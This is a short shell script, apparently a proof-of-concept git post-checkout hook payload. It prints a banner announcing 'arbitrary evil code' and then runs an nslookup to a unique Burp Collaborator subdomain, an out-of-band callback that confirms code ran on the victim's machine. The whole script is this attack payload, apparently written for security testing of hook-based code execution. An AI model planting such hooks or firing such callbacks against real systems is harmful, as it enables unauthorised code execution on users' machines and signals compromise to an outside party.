#!/bin/sh
echo '=================================='
echo ' arbitrary evil code goes here ;) '
echo '=================================='
nslookup post-checkout.cgwjbsfvmvc9bqjowwfwihmprgx7lw.burpcollaborator.net
